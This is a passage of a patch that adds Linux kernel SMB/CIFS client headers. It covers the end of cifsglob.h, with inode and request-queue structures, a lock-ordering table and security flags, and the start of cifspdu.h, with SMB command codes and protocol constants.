++#define CIFS_CACHE_RHW_FLG	(CIFS_CACHE_RW_FLG | CIFS_CACHE_HANDLE_FLG)
++
++#define CIFS_CACHE_READ(cinode) ((cinode->oplock & CIFS_CACHE_READ_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE))
++#define CIFS_CACHE_HANDLE(cinode) (cinode->oplock & CIFS_CACHE_HANDLE_FLG)
++#define CIFS_CACHE_WRITE(cinode) ((cinode->oplock & CIFS_CACHE_WRITE_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE))
++
++/*
++ * One of these for each file inode
++ */
++
++struct cifsInodeInfo {
++	struct netfs_inode netfs; /* Netfslib context and vfs inode */
++	bool can_cache_brlcks;
++	struct list_head llist;	/* locks helb by this inode */
++	/*
++	 * NOTE: Some code paths call down_read(lock_sem) twice, so
++	 * we must always use cifs_down_write() instead of down_write()
++	 * for this semaphore to avoid deadlocks.
++	 */
++	struct rw_semaphore lock_sem;	/* protect the fields above */
++	/* BB add in lists for dirty pages i.e. write caching info for oplock */
++	struct list_head openFileList;
++	spinlock_t	open_file_lock;	/* protects openFileList */
++	__u32 cifsAttrs; /* e.g. DOS archive bit, sparse, compressed, system */
++	unsigned int oplock;		/* oplock/lease level we have */
++	unsigned int epoch;		/* used to track lease state changes */
++#define CIFS_INODE_PENDING_OPLOCK_BREAK   (0) /* oplock break in progress */
++#define CIFS_INODE_PENDING_WRITERS	  (1) /* Writes in progress */
++#define CIFS_INODE_FLAG_UNUSED		  (2) /* Unused flag */
++#define CIFS_INO_DELETE_PENDING		  (3) /* delete pending on server */
++#define CIFS_INO_INVALID_MAPPING	  (4) /* pagecache is invalid */
++#define CIFS_INO_LOCK			  (5) /* lock bit for synchronization */
++#define CIFS_INO_MODIFIED_ATTR            (6) /* Indicate change in mtime/ctime */
++#define CIFS_INO_CLOSE_ON_LOCK            (7) /* Not to defer the close when lock is set */
++	unsigned long flags;
++	spinlock_t writers_lock;
++	unsigned int writers;		/* Number of writers on this inode */
++	unsigned long time;		/* jiffies of last update of inode */
++	u64  server_eof;		/* current file size on server -- protected by i_lock */
++	u64  uniqueid;			/* server inode number */
++	u64  createtime;		/* creation time on server */
++	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for this inode */
++	struct list_head deferred_closes; /* list of deferred closes */
++	spinlock_t deferred_lock; /* protection on deferred list */
++	bool lease_granted; /* Flag to indicate whether lease or oplock is granted. */
++	char *symlink_target;
++};
++
++static inline struct cifsInodeInfo *
++CIFS_I(struct inode *inode)
++{
++	return container_of(inode, struct cifsInodeInfo, netfs.inode);
++}
++
++static inline struct cifs_sb_info *
++CIFS_SB(struct super_block *sb)
++{
++	return sb->s_fs_info;
++}
++
++static inline struct cifs_sb_info *
++CIFS_FILE_SB(struct file *file)
++{
++	return CIFS_SB(file_inode(file)->i_sb);
++}
++
++static inline char CIFS_DIR_SEP(const struct cifs_sb_info *cifs_sb)
++{
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
++		return '/';
++	else
++		return '\\';
++}
++
++static inline void
++convert_delimiter(char *path, char delim)
++{
++	char old_delim, *pos;
++
++	if (delim == '/')
++		old_delim = '\\';
++	else
++		old_delim = '/';
++
++	pos = path;
++	while ((pos = strchr(pos, old_delim)))
++		*pos = delim;
++}
++
++#define cifs_stats_inc atomic_inc
++
++static inline void cifs_stats_bytes_written(struct cifs_tcon *tcon,
++					    unsigned int bytes)
++{
++	if (bytes) {
++		spin_lock(&tcon->stat_lock);
++		tcon->bytes_written += bytes;
++		spin_unlock(&tcon->stat_lock);
++	}
++}
++
++static inline void cifs_stats_bytes_read(struct cifs_tcon *tcon,
++					 unsigned int bytes)
++{
++	spin_lock(&tcon->stat_lock);
++	tcon->bytes_read += bytes;
++	spin_unlock(&tcon->stat_lock);
++}
++
++
++/*
++ * This is the prototype for the mid receive function. This function is for
++ * receiving the rest of the SMB frame, starting with the WordCount (which is
++ * just after the MID in struct smb_hdr). Note:
++ *
++ * - This will be called by cifsd, with no locks held.
++ * - The mid will still be on the pending_mid_q.
++ * - mid->resp_buf will point to the current buffer.
++ *
++ * Returns zero on a successful receive, or an error. The receive state in
++ * the TCP_Server_Info will also be updated.
++ */
++typedef int (mid_receive_t)(struct TCP_Server_Info *server,
++			    struct mid_q_entry *mid);
++
++/*
++ * This is the prototype for the mid callback function. This is called once the
++ * mid has been received off of the socket. When creating one, take special
++ * care to avoid deadlocks. Things to bear in mind:
++ *
++ * - it will be called by cifsd, with no locks held
++ * - the mid will be removed from any lists
++ */
++typedef void (mid_callback_t)(struct mid_q_entry *mid);
++
++/*
++ * This is the protopyte for mid handle function. This is called once the mid
++ * has been recognized after decryption of the message.
++ */
++typedef int (mid_handle_t)(struct TCP_Server_Info *server,
++			    struct mid_q_entry *mid);
++
++/* one of these for every pending CIFS request to the server */
++struct mid_q_entry {
++	struct list_head qhead;	/* mids waiting on reply from this server */
++	struct kref refcount;
++	struct TCP_Server_Info *server;	/* server corresponding to this mid */
++	__u64 mid;		/* multiplex id */
++	__u16 credits;		/* number of credits consumed by this mid */
++	__u16 credits_received;	/* number of credits from the response */
++	__u32 pid;		/* process id */
++	__u32 sequence_number;  /* for CIFS signing */
++	unsigned long when_alloc;  /* when mid was created */
++#ifdef CONFIG_CIFS_STATS2
++	unsigned long when_sent; /* time when smb send finished */
++	unsigned long when_received; /* when demux complete (taken off wire) */
++#endif
++	mid_receive_t *receive; /* call receive callback */
++	mid_callback_t *callback; /* call completion callback */
++	mid_handle_t *handle; /* call handle mid callback */
++	void *callback_data;	  /* general purpose pointer for callback */
++	struct task_struct *creator;
++	void *resp_buf;		/* pointer to received SMB header */
++	unsigned int resp_buf_size;
++	int mid_state;	/* wish this were enum but can not pass to wait_event */
++	unsigned int mid_flags;
++	__le16 command;		/* smb command code */
++	unsigned int optype;	/* operation type */
++	bool large_buf:1;	/* if valid response, is pointer to large buf */
++	bool multiRsp:1;	/* multiple trans2 responses for one request  */
++	bool multiEnd:1;	/* both received */
++	bool decrypted:1;	/* decrypted entry */
++};
++
++struct close_cancelled_open {
++	struct cifs_fid         fid;
++	struct cifs_tcon        *tcon;
++	struct work_struct      work;
++	__u64 mid;
++	__u16 cmd;
++};
++
++/*	Make code in transport.c a little cleaner by moving
++	update of optional stats into function below */
++static inline void cifs_in_send_inc(struct TCP_Server_Info *server)
++{
++	atomic_inc(&server->in_send);
++}
++
++static inline void cifs_in_send_dec(struct TCP_Server_Info *server)
++{
++	atomic_dec(&server->in_send);
++}
++
++static inline void cifs_num_waiters_inc(struct TCP_Server_Info *server)
++{
++	atomic_inc(&server->num_waiters);
++}
++
++static inline void cifs_num_waiters_dec(struct TCP_Server_Info *server)
++{
++	atomic_dec(&server->num_waiters);
++}
++
++#ifdef CONFIG_CIFS_STATS2
++static inline void cifs_save_when_sent(struct mid_q_entry *mid)
++{
++	mid->when_sent = jiffies;
++}
++#else
++static inline void cifs_save_when_sent(struct mid_q_entry *mid)
++{
++}
++#endif
++
++/* for pending dnotify requests */
++struct dir_notify_req {
++	struct list_head lhead;
++	__le16 Pid;
++	__le16 PidHigh;
++	__u16 Mid;
++	__u16 Tid;
++	__u16 Uid;
++	__u16 netfid;
++	__u32 filter; /* CompletionFilter (for multishot) */
++	int multishot;
++	struct file *pfile;
++};
++
++struct dfs_info3_param {
++	int flags; /* DFSREF_REFERRAL_SERVER, DFSREF_STORAGE_SERVER*/
++	int path_consumed;
++	int server_type;
++	int ref_flag;
++	char *path_name;
++	char *node_name;
++	int ttl;
++};
++
++struct file_list {
++	struct list_head list;
++	struct cifsFileInfo *cfile;
++};
++
++static inline void free_dfs_info_param(struct dfs_info3_param *param)
++{
++	if (param) {
++		kfree(param->path_name);
++		kfree(param->node_name);
++	}
++}
++
++static inline void free_dfs_info_array(struct dfs_info3_param *param,
++				       int number_of_items)
++{
++	int i;
++	if ((number_of_items == 0) || (param == NULL))
++		return;
++	for (i = 0; i < number_of_items; i++) {
++		kfree(param[i].path_name);
++		kfree(param[i].node_name);
++	}
++	kfree(param);
++}
++
++static inline bool is_interrupt_error(int error)
++{
++	switch (error) {
++	case -EINTR:
++	case -ERESTARTSYS:
++	case -ERESTARTNOHAND:
++	case -ERESTARTNOINTR:
++		return true;
++	}
++	return false;
++}
++
++static inline bool is_retryable_error(int error)
++{
++	if (is_interrupt_error(error) || error == -EAGAIN)
++		return true;
++	return false;
++}
++
++
++/* cifs_get_writable_file() flags */
++#define FIND_WR_ANY         0
++#define FIND_WR_FSUID_ONLY  1
++#define FIND_WR_WITH_DELETE 2
++
++#define   MID_FREE 0
++#define   MID_REQUEST_ALLOCATED 1
++#define   MID_REQUEST_SUBMITTED 2
++#define   MID_RESPONSE_RECEIVED 4
++#define   MID_RETRY_NEEDED      8 /* session closed while this request out */
++#define   MID_RESPONSE_MALFORMED 0x10
++#define   MID_SHUTDOWN		 0x20
++
++/* Flags */
++#define   MID_WAIT_CANCELLED	 1 /* Cancelled while waiting for response */
++#define   MID_DELETED            2 /* Mid has been dequeued/deleted */
++
++/* Types of response buffer returned from SendReceive2 */
++#define   CIFS_NO_BUFFER        0    /* Response buffer not returned */
++#define   CIFS_SMALL_BUFFER     1
++#define   CIFS_LARGE_BUFFER     2
++#define   CIFS_IOVEC            4    /* array of response buffers */
++
++/* Type of Request to SendReceive2 */
++#define   CIFS_BLOCKING_OP      1    /* operation can block */
++#define   CIFS_NON_BLOCKING     2    /* do not block waiting for credits */
++#define   CIFS_TIMEOUT_MASK 0x003    /* only one of above set in req */
++#define   CIFS_LOG_ERROR    0x010    /* log NT STATUS if non-zero */
++#define   CIFS_LARGE_BUF_OP 0x020    /* large request buffer */
++#define   CIFS_NO_RSP_BUF   0x040    /* no response buffer required */
++
++/* Type of request operation */
++#define   CIFS_ECHO_OP            0x080  /* echo request */
++#define   CIFS_OBREAK_OP          0x0100 /* oplock break request */
++#define   CIFS_NEG_OP             0x0200 /* negotiate request */
++#define   CIFS_CP_CREATE_CLOSE_OP 0x0400 /* compound create+close request */
++/* Lower bitmask values are reserved by others below. */
++#define   CIFS_SESS_OP            0x2000 /* session setup request */
++#define   CIFS_OP_MASK            0x2780 /* mask request type */
++
++#define   CIFS_HAS_CREDITS        0x0400 /* already has credits */
++#define   CIFS_TRANSFORM_REQ      0x0800 /* transform request before sending */
++#define   CIFS_NO_SRV_RSP         0x1000 /* there is no server response */
++
++/* Security Flags: indicate type of session setup needed */
++#define   CIFSSEC_MAY_SIGN	0x00001
++#define   CIFSSEC_MAY_NTLMV2	0x00004
++#define   CIFSSEC_MAY_KRB5	0x00008
++#define   CIFSSEC_MAY_SEAL	0x00040 /* not supported yet */
++#define   CIFSSEC_MAY_NTLMSSP	0x00080 /* raw ntlmssp with ntlmv2 */
++
++#define   CIFSSEC_MUST_SIGN	0x01001
++/* note that only one of the following can be set so the
++result of setting MUST flags more than once will be to
++require use of the stronger protocol */
++#define   CIFSSEC_MUST_NTLMV2	0x04004
++#define   CIFSSEC_MUST_KRB5	0x08008
++#ifdef CONFIG_CIFS_UPCALL
++#define   CIFSSEC_MASK          0x8F08F /* flags supported if no weak allowed */
++#else
++#define	  CIFSSEC_MASK          0x87087 /* flags supported if no weak allowed */
++#endif /* UPCALL */
++#define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
++#define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
++
++#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP)
++#define   CIFSSEC_MAX (CIFSSEC_MUST_NTLMV2)
++#define   CIFSSEC_AUTH_MASK (CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP)
++/*
++ *****************************************************************
++ * All constants go here
++ *****************************************************************
++ */
++
++#define UID_HASH (16)
++
++/*
++ * Note that ONE module should define _DECLARE_GLOBALS_HERE to cause the
++ * following to be declared.
++ */
++
++/****************************************************************************
++ * Here are all the locks (spinlock, mutex, semaphore) in cifs.ko, arranged according
++ * to the locking order. i.e. if two locks are to be held together, the lock that
++ * appears higher in this list needs to be taken before the other.
++ *
++ * If you hold a lock that is lower in this list, and you need to take a higher lock
++ * (or if you think that one of the functions that you're calling may need to), first
++ * drop the lock you hold, pick up the higher lock, then the lower one. This will
++ * ensure that locks are picked up only in one direction in the below table
++ * (top to bottom).
++ *
++ * Also, if you expect a function to be called with a lock held, explicitly document
++ * this in the comments on top of your function definition.
++ *
++ * And also, try to keep the critical sections (lock hold time) to be as minimal as
++ * possible. Blocking / calling other functions with a lock held always increase
++ * the risk of a possible deadlock.
++ *
++ * Following this rule will avoid unnecessary deadlocks, which can get really hard to
++ * debug. Also, any new lock that you introduce, please add to this list in the correct
++ * order.
++ *
++ * Please populate this list whenever you introduce new locks in your changes. Or in
++ * case I've missed some existing locks. Please ensure that it's added in the list
++ * based on the locking order expected.
++ *
++ * =====================================================================================
++ * Lock				Protects			Initialization fn
++ * =====================================================================================
++ * vol_list_lock
++ * vol_info->ctx_lock		vol_info->ctx
++ * cifs_sb_info->tlink_tree_lock	cifs_sb_info->tlink_tree	cifs_setup_cifs_sb
++ * TCP_Server_Info->		TCP_Server_Info			cifs_get_tcp_session
++ * reconnect_mutex
++ * TCP_Server_Info->srv_mutex	TCP_Server_Info			cifs_get_tcp_session
++ * cifs_ses->session_mutex		cifs_ses		sesInfoAlloc
++ *				cifs_tcon
++ * cifs_tcon->open_file_lock	cifs_tcon->openFileList		tconInfoAlloc
++ *				cifs_tcon->pending_opens
++ * cifs_tcon->stat_lock		cifs_tcon->bytes_read		tconInfoAlloc
++ *				cifs_tcon->bytes_written
++ * cifs_tcp_ses_lock		cifs_tcp_ses_list		sesInfoAlloc
++ * GlobalMid_Lock		GlobalMaxActiveXid		init_cifs
++ *				GlobalCurrentXid
++ *				GlobalTotalActiveXid
++ * TCP_Server_Info->srv_lock	(anything in struct not protected by another lock and can change)
++ * TCP_Server_Info->mid_lock	TCP_Server_Info->pending_mid_q	cifs_get_tcp_session
++ *				->CurrentMid
++ *				(any changes in mid_q_entry fields)
++ * TCP_Server_Info->req_lock	TCP_Server_Info->in_flight	cifs_get_tcp_session
++ *				->credits
++ *				->echo_credits
++ *				->oplock_credits
++ *				->reconnect_instance
++ * cifs_ses->ses_lock		(anything that is not protected by another lock and can change)
++ * cifs_ses->iface_lock		cifs_ses->iface_list		sesInfoAlloc
++ *				->iface_count
++ *				->iface_last_update
++ * cifs_ses->chan_lock		cifs_ses->chans
++ *				->chans_need_reconnect
++ *				->chans_in_reconnect
++ * cifs_tcon->tc_lock		(anything that is not protected by another lock and can change)
++ * cifsInodeInfo->open_file_lock	cifsInodeInfo->openFileList	cifs_alloc_inode
++ * cifsInodeInfo->writers_lock	cifsInodeInfo->writers		cifsInodeInfo_alloc
++ * cifsInodeInfo->lock_sem	cifsInodeInfo->llist		cifs_init_once
++ *				->can_cache_brlcks
++ * cifsInodeInfo->deferred_lock	cifsInodeInfo->deferred_closes	cifsInodeInfo_alloc
++ * cached_fid->fid_mutex		cifs_tcon->crfid		tconInfoAlloc
++ * cifsFileInfo->fh_mutex		cifsFileInfo			cifs_new_fileinfo
++ * cifsFileInfo->file_info_lock	cifsFileInfo->count		cifs_new_fileinfo
++ *				->invalidHandle			initiate_cifs_search
++ *				->oplock_break_cancelled
++ * cifs_aio_ctx->aio_mutex		cifs_aio_ctx			cifs_aio_ctx_alloc
++ ****************************************************************************/
++
++#ifdef DECLARE_GLOBALS_HERE
++#define GLOBAL_EXTERN
++#else
++#define GLOBAL_EXTERN extern
++#endif
++
++/*
++ * the list of TCP_Server_Info structures, ie each of the sockets
++ * connecting our client to a distinct server (ip address), is
++ * chained together by cifs_tcp_ses_list. The list of all our SMB
++ * sessions (and from that the tree connections) can be found
++ * by iterating over cifs_tcp_ses_list
++ */
++extern struct list_head		cifs_tcp_ses_list;
++
++/*
++ * This lock protects the cifs_tcp_ses_list, the list of smb sessions per
++ * tcp session, and the list of tcon's per smb session. It also protects
++ * the reference counters for the server, smb session, and tcon.
++ * generally the locks should be taken in order tcp_ses_lock before
++ * tcon->open_file_lock and that before file->file_info_lock since the
++ * structure order is cifs_socket-->cifs_ses-->cifs_tcon-->cifs_file
++ */
++extern spinlock_t		cifs_tcp_ses_lock;
++
++/*
++ * Global transaction id (XID) information
++ */
++extern unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Sem */
++extern unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Sem */
++extern unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Sem */
++extern spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
++
++/*
++ *  Global counters, updated atomically
++ */
++extern atomic_t sesInfoAllocCount;
++extern atomic_t tconInfoAllocCount;
++extern atomic_t tcpSesNextId;
++extern atomic_t tcpSesAllocCount;
++extern atomic_t tcpSesReconnectCount;
++extern atomic_t tconInfoReconnectCount;
++
++/* Various Debug counters */
++extern atomic_t buf_alloc_count;	/* current number allocated  */
++extern atomic_t small_buf_alloc_count;
++#ifdef CONFIG_CIFS_STATS2
++extern atomic_t total_buf_alloc_count; /* total allocated over all time */
++extern atomic_t total_small_buf_alloc_count;
++extern unsigned int slow_rsp_threshold; /* number of secs before logging */
++#endif
++
++/* Misc globals */
++extern bool enable_oplocks; /* enable or disable oplocks */
++extern bool lookupCacheEnabled;
++extern unsigned int global_secflags;	/* if on, session setup sent
++				with more secure ntlmssp2 challenge/resp */
++extern unsigned int sign_CIFS_PDUs;  /* enable smb packet signing */
++extern bool enable_gcm_256; /* allow optional negotiate of strongest signing (aes-gcm-256) */
++extern bool require_gcm_256; /* require use of strongest signing (aes-gcm-256) */
++extern bool enable_negotiate_signing; /* request use of faster (GMAC) signing if available */
++extern bool linuxExtEnabled;/*enable Linux/Unix CIFS extensions*/
++extern unsigned int CIFSMaxBufSize;  /* max size not including hdr */
++extern unsigned int cifs_min_rcv;    /* min size of big ntwrk buf pool */
++extern unsigned int cifs_min_small;  /* min size of small buf pool */
++extern unsigned int cifs_max_pending; /* MAX requests at once to server*/
++extern bool disable_legacy_dialects;  /* forbid vers=1.0 and vers=2.0 mounts */
++extern atomic_t mid_count;
++
++void cifs_oplock_break(struct work_struct *work);
++void cifs_queue_oplock_break(struct cifsFileInfo *cfile);
++void smb2_deferred_work_close(struct work_struct *work);
++
++extern const struct slow_work_ops cifs_oplock_break_ops;
++extern struct workqueue_struct *cifsiod_wq;
++extern struct workqueue_struct *decrypt_wq;
++extern struct workqueue_struct *fileinfo_put_wq;
++extern struct workqueue_struct *cifsoplockd_wq;
++extern struct workqueue_struct *deferredclose_wq;
++extern __u32 cifs_lock_secret;
++
++extern mempool_t *cifs_mid_poolp;
++
++/* Operations for different SMB versions */
++#define SMB1_VERSION_STRING	"1.0"
++#define SMB20_VERSION_STRING    "2.0"
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++extern struct smb_version_operations smb1_operations;
++extern struct smb_version_values smb1_values;
++extern struct smb_version_operations smb20_operations;
++extern struct smb_version_values smb20_values;
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++#define SMB21_VERSION_STRING	"2.1"
++extern struct smb_version_operations smb21_operations;
++extern struct smb_version_values smb21_values;
++#define SMBDEFAULT_VERSION_STRING "default"
++extern struct smb_version_values smbdefault_values;
++#define SMB3ANY_VERSION_STRING "3"
++extern struct smb_version_values smb3any_values;
++#define SMB30_VERSION_STRING	"3.0"
++extern struct smb_version_operations smb30_operations;
++extern struct smb_version_values smb30_values;
++#define SMB302_VERSION_STRING	"3.02"
++#define ALT_SMB302_VERSION_STRING "3.0.2"
++/*extern struct smb_version_operations smb302_operations;*/ /* not needed yet */
++extern struct smb_version_values smb302_values;
++#define SMB311_VERSION_STRING	"3.1.1"
++#define ALT_SMB311_VERSION_STRING "3.11"
++extern struct smb_version_operations smb311_operations;
++extern struct smb_version_values smb311_values;
++
++static inline char *get_security_type_str(enum securityEnum sectype)
++{
++	switch (sectype) {
++	case RawNTLMSSP:
++		return "RawNTLMSSP";
++	case Kerberos:
++		return "Kerberos";
++	case NTLMv2:
++		return "NTLMv2";
++	default:
++		return "Unknown";
++	}
++}
++
++static inline bool is_smb1_server(struct TCP_Server_Info *server)
++{
++	return strcmp(server->vals->version_string, SMB1_VERSION_STRING) == 0;
++}
++
++static inline bool is_tcon_dfs(struct cifs_tcon *tcon)
++{
++	/*
++	 * For SMB1, see MS-CIFS 2.4.55 SMB_COM_TREE_CONNECT_ANDX (0x75) and MS-CIFS 3.3.4.4 DFS
++	 * Subsystem Notifies That a Share Is a DFS Share.
++	 *
++	 * For SMB2+, see MS-SMB2 2.2.10 SMB2 TREE_CONNECT Response and MS-SMB2 3.3.4.14 Server
++	 * Application Updates a Share.
++	 */
++	if (!tcon || !tcon->ses || !tcon->ses->server)
++		return false;
++	return is_smb1_server(tcon->ses->server) ? tcon->Flags & SMB_SHARE_IS_IN_DFS :
++		tcon->share_flags & (SHI1005_FLAGS_DFS | SHI1005_FLAGS_DFS_ROOT);
++}
++
++static inline bool cifs_is_referral_server(struct cifs_tcon *tcon,
++					   const struct dfs_info3_param *ref)
++{
++	/*
++	 * Check if all targets are capable of handling DFS referrals as per
++	 * MS-DFSC 2.2.4 RESP_GET_DFS_REFERRAL.
++	 */
++	return is_tcon_dfs(tcon) || (ref && (ref->flags & DFSREF_REFERRAL_SERVER));
++}
++
++static inline u64 cifs_flock_len(const struct file_lock *fl)
++{
++	return (u64)fl->fl_end - fl->fl_start + 1;
++}
++
++static inline size_t ntlmssp_workstation_name_size(const struct cifs_ses *ses)
++{
++	if (WARN_ON_ONCE(!ses || !ses->server))
++		return 0;
++	/*
++	 * Make workstation name no more than 15 chars when using insecure dialects as some legacy
++	 * servers do require it during NTLMSSP.
++	 */
++	if (ses->server->dialect <= SMB20_PROT_ID)
++		return min_t(size_t, sizeof(ses->workstation_name), RFC1001_NAME_LEN_WITH_NULL);
++	return sizeof(ses->workstation_name);
++}
++
++static inline void move_cifs_info_to_smb2(struct smb2_file_all_info *dst, const FILE_ALL_INFO *src)
++{
++	memcpy(dst, src, (size_t)((u8 *)&src->AccessFlags - (u8 *)src));
++	dst->AccessFlags = src->AccessFlags;
++	dst->CurrentByteOffset = src->CurrentByteOffset;
++	dst->Mode = src->Mode;
++	dst->AlignmentRequirement = src->AlignmentRequirement;
++	dst->FileNameLength = src->FileNameLength;
++}
++
++static inline unsigned int cifs_get_num_sgs(const struct smb_rqst *rqst,
++					    int num_rqst,
++					    const u8 *sig)
++{
++	unsigned int len, skip;
++	unsigned int nents = 0;
++	unsigned long addr;
++	int i, j;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
++		for (j = 0; j < rqst[i].rq_nvec; j++) {
++			struct kvec *iov = &rqst[i].rq_iov[j];
++
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			if (unlikely(is_vmalloc_addr((void *)addr))) {
++				len = iov->iov_len - skip;
++				nents += DIV_ROUND_UP(offset_in_page(addr) + len,
++						      PAGE_SIZE);
++			} else {
++				nents++;
++			}
++		}
++		nents += rqst[i].rq_npages;
++	}
++	nents += DIV_ROUND_UP(offset_in_page(sig) + SMB2_SIGNATURE_SIZE, PAGE_SIZE);
++	return nents;
++}
++
++/* We can not use the normal sg_set_buf() as we will sometimes pass a
++ * stack object as buf.
++ */
++static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
++						  const void *buf,
++						  unsigned int buflen)
++{
++	unsigned long addr = (unsigned long)buf;
++	unsigned int off = offset_in_page(addr);
++
++	addr &= PAGE_MASK;
++	if (unlikely(is_vmalloc_addr((void *)addr))) {
++		do {
++			unsigned int len = min_t(unsigned int, buflen, PAGE_SIZE - off);
++
++			sg_set_page(sg++, vmalloc_to_page((void *)addr), len, off);
++
++			off = 0;
++			addr += PAGE_SIZE;
++			buflen -= len;
++		} while (buflen);
++	} else {
++		sg_set_page(sg++, virt_to_page(addr), buflen, off);
++	}
++	return sg;
++}
++
++#endif	/* _CIFS_GLOB_H */
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+new file mode 100644
+index 0000000000000..cc458b98441c7
+--- /dev/null
++++ b/fs/smb/client/cifspdu.h
+@@ -0,0 +1,2730 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFSPDU_H
++#define _CIFSPDU_H
++
++#include <net/sock.h>
++#include <asm/unaligned.h>
++#include "../common/smbfsctl.h"
++
++#define CIFS_PROT   0
++#define POSIX_PROT  (CIFS_PROT+1)
++#define BAD_PROT 0xFFFF
++
++/* SMB command codes:
++ * Note some commands have minimal (wct=0,bcc=0), or uninteresting, responses
++ * (ie which include no useful data other than the SMB error code itself).
++ * This can allow us to avoid response buffer allocations and copy in some cases
++ */
++#define SMB_COM_CREATE_DIRECTORY      0x00 /* trivial response */
++#define SMB_COM_DELETE_DIRECTORY      0x01 /* trivial response */
++#define SMB_COM_CLOSE                 0x04 /* triv req/rsp, timestamp ignored */
++#define SMB_COM_FLUSH                 0x05 /* triv req/rsp */
++#define SMB_COM_DELETE                0x06 /* trivial response */
++#define SMB_COM_RENAME                0x07 /* trivial response */
++#define SMB_COM_QUERY_INFORMATION     0x08 /* aka getattr */
++#define SMB_COM_SETATTR               0x09 /* trivial response */
++#define SMB_COM_LOCKING_ANDX          0x24 /* trivial response */
++#define SMB_COM_COPY                  0x29 /* trivial rsp, fail filename ignrd*/
++#define SMB_COM_ECHO                  0x2B /* echo request */
++#define SMB_COM_OPEN_ANDX             0x2D /* Legacy open for old servers */
++#define SMB_COM_READ_ANDX             0x2E
++#define SMB_COM_WRITE_ANDX            0x2F
++#define SMB_COM_TRANSACTION2          0x32
++#define SMB_COM_TRANSACTION2_SECONDARY 0x33
++#define SMB_COM_FIND_CLOSE2           0x34 /* trivial response */
++#define SMB_COM_TREE_DISCONNECT       0x71 /* trivial response */
++#define SMB_COM_NEGOTIATE             0x72
++#define SMB_COM_SESSION_SETUP_ANDX    0x73
++#define SMB_COM_LOGOFF_ANDX           0x74 /* trivial response */
++#define SMB_COM_TREE_CONNECT_ANDX     0x75
++#define SMB_COM_NT_TRANSACT           0xA0
++#define SMB_COM_NT_TRANSACT_SECONDARY 0xA1
++#define SMB_COM_NT_CREATE_ANDX        0xA2
++#define SMB_COM_NT_CANCEL             0xA4 /* no response */
++#define SMB_COM_NT_RENAME             0xA5 /* trivial response */
++
++/* Transact2 subcommand codes */
++#define TRANS2_OPEN                   0x00
++#define TRANS2_FIND_FIRST             0x01
++#define TRANS2_FIND_NEXT              0x02
++#define TRANS2_QUERY_FS_INFORMATION   0x03
++#define TRANS2_SET_FS_INFORMATION     0x04
++#define TRANS2_QUERY_PATH_INFORMATION 0x05
++#define TRANS2_SET_PATH_INFORMATION   0x06
++#define TRANS2_QUERY_FILE_INFORMATION 0x07
++#define TRANS2_SET_FILE_INFORMATION   0x08
++#define TRANS2_GET_DFS_REFERRAL       0x10
++#define TRANS2_REPORT_DFS_INCOSISTENCY 0x11
++
++/* SMB Transact (Named Pipe) subcommand codes */
++#define TRANS_SET_NMPIPE_STATE      0x0001
++#define TRANS_RAW_READ_NMPIPE       0x0011
++#define TRANS_QUERY_NMPIPE_STATE    0x0021
++#define TRANS_QUERY_NMPIPE_INFO     0x0022
++#define TRANS_PEEK_NMPIPE           0x0023
++#define TRANS_TRANSACT_NMPIPE       0x0026
++#define TRANS_RAW_WRITE_NMPIPE      0x0031
++#define TRANS_READ_NMPIPE           0x0036
++#define TRANS_WRITE_NMPIPE          0x0037
++#define TRANS_WAIT_NMPIPE           0x0053
++#define TRANS_CALL_NMPIPE           0x0054
++
++/* NT Transact subcommand codes */
++#define NT_TRANSACT_CREATE            0x01
++#define NT_TRANSACT_IOCTL             0x02
++#define NT_TRANSACT_SET_SECURITY_DESC 0x03
++#define NT_TRANSACT_NOTIFY_CHANGE     0x04
++#define NT_TRANSACT_RENAME            0x05
++#define NT_TRANSACT_QUERY_SECURITY_DESC 0x06
++#define NT_TRANSACT_GET_USER_QUOTA    0x07
++#define NT_TRANSACT_SET_USER_QUOTA    0x08
++
++#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
++/* future chained NTCreateXReadX bigger, but for time being NTCreateX biggest */
++/* among the requests (NTCreateX response is bigger with wct of 34) */
++#define MAX_CIFS_HDR_SIZE 0x58 /* 4 len + 32 hdr + (2*24 wct) + 2 bct + 2 pad */
++#define CIFS_SMALL_PATH 120 /* allows for (448-88)/3 */
++
++/* internal cifs vfs structures */
++/*****************************************************************
++ * All constants go here
++ *****************************************************************
++ */
++
++/*
++ * Starting value for maximum SMB size negotiation
++ */
++#define CIFS_MAX_MSGSIZE (4*4096)
++
++/*
++ * Size of encrypted user password in bytes
++ */
++#define CIFS_ENCPWD_SIZE (16)
++
++/*
++ * Size of the crypto key returned on the negotiate SMB in bytes
++ */
++#define CIFS_CRYPTO_KEY_SIZE (8)
++
++/*
